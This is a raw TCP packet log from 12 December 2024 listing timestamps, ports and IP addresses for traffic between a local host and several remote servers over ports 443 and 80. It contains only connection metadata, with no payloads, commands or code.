Dec 12, 2024 16:48:23.851579905 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.851588964 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.851632118 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.855339050 CET	443	49889	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:23.858866930 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.858928919 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.859086037 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.859421968 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.867721081 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.867779016 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.867850065 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.867971897 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.867979050 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.868026972 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.869131088 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.869185925 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.875890017 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.878384113 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.878393888 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.878436089 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.884507895 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.885732889 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.885744095 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.885787010 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.890630007 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.891593933 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.892020941 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.892070055 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.896800995 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.899727106 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.899738073 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.899785995 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.903178930 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.903235912 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.904432058 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.904484987 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.909413099 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.909472942 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.910525084 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.910573006 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.920644045 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.920711994 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.921982050 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.922029972 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.922561884 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.922607899 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.927083015 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.927129984 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.951611996 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.951869965 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.951956987 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.951966047 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.951994896 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.952017069 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.952042103 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.952084064 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.952135086 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.952172995 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.952217102 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.952261925 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.952311993 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.952351093 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.952398062 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.952440023 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.952486992 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.952536106 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.952588081 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.953661919 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.953716993 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.953790903 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.953836918 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.959240913 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.959610939 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.959618092 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.959659100 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.964724064 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.967593908 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.967602015 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.967644930 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.969187975 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.969240904 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.969420910 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.969466925 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.973800898 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.975572109 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.975579023 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.975616932 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.978609085 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.978687048 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.978699923 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.978748083 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.983341932 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.983409882 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.983459949 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.983597994 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.988373995 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.988440990 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.988523960 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.988576889 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.993232012 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.995592117 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:23.995598078 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:23.995636940 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:24.006788015 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:24.006872892 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:24.006886005 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:24.006925106 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:24.007085085 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:24.007136106 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:24.007186890 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:24.265642881 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.265769958 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.265783072 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.265795946 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.265870094 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.265873909 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.265882969 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.265916109 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.265928030 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.265937090 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.265940905 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.265954018 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.265976906 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.266021967 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.266057014 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.386464119 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.386482000 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.386594057 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.390701056 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.395606041 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.438709974 CET	49895	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:24.438828945 CET	443	49895	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:24.438949108 CET	49895	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:24.457535028 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.457561016 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.457642078 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.461736917 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.461849928 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.461925030 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.470309973 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.470357895 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.470395088 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.470426083 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.478740931 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.478846073 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.479020119 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.487212896 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.487267017 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.487344027 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.495786905 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.495836020 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.495970964 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.496603012 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.504157066 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.504458904 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.504529953 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.512628078 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.512664080 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.512739897 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.521094084 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.521205902 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.521266937 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.529524088 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.529597998 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.529659986 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.531073093 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.538106918 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.538202047 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.538259983 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.546093941 CET	49895	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:24.546133995 CET	443	49895	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:24.577403069 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.577486992 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.577564001 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.649627924 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.649672985 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.649738073 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.649738073 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.652271032 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.652323008 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.652355909 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.652633905 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.656985998 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.657043934 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.657069921 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.657238007 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.661986113 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.662061930 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.662091017 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.662106991 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.666749001 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.666800976 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.666851997 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.666898012 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.671595097 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.671703100 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.671751022 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.676366091 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.676420927 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.676459074 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.676470995 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.680973053 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.681026936 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.681029081 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.681113005 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.685657024 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.685704947 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.685758114 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.685801983 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.690356970 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.690465927 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.690468073 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.690511942 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.695139885 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.695210934 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.695246935 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.695327997 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.699695110 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.699738979 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.699908018 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.699949980 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.704447031 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.704498053 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.704528093 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.704579115 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.709549904 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.709611893 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.709676027 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.709714890 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.711549997 CET	443	49889	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:24.712152004 CET	49889	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:24.712168932 CET	443	49889	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:24.712234020 CET	49889	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:24.712686062 CET	49889	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:24.712770939 CET	443	49889	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:24.712904930 CET	49889	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:24.712924957 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.712968111 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.713030100 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.713114977 CET	443	49889	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:24.713190079 CET	49889	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:24.715573072 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.716696024 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.716738939 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.716773987 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.717000008 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.720501900 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.720551968 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.720593929 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.720628977 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.724356890 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.724438906 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.724498034 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.724541903 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.728169918 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.728213072 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.728269100 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.728415966 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.731992006 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.732094049 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.732124090 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.732167006 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.735815048 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.735914946 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.735974073 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.739171028 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:24.739217997 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:24.739373922 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:24.739705086 CET	49896	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:24.739717007 CET	443	49896	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:24.739723921 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.739774942 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.739806890 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.739850044 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.769598961 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.769644022 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.769655943 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.769685030 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.771692991 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.771748066 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.771770000 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.771833897 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.841583967 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.841660023 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.841681004 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.841754913 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.843053102 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.843106985 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.843130112 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.843173027 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.846023083 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.846079111 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.846101999 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.846174002 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.848974943 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.849025011 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.849127054 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.849174023 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.852082968 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.852114916 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.852142096 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.852153063 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.854809046 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.854942083 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.854974031 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.855001926 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.857551098 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.857603073 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.857913017 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.858623981 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.860384941 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.860434055 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.860481024 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.860523939 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.863018036 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.863068104 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.863099098 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.863143921 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.865683079 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.865737915 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.865952969 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.865998030 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.868295908 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.868350029 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.868361950 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.868480921 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.870873928 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.870932102 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.870944023 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.870990992 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.873421907 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.873482943 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.873573065 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.875585079 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.875967026 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.876064062 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.876077890 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.876113892 CET	49890	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:24.878582954 CET	80	49890	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:24.878628969 CET	49890	80	192.168.2.10	31.41.244.11
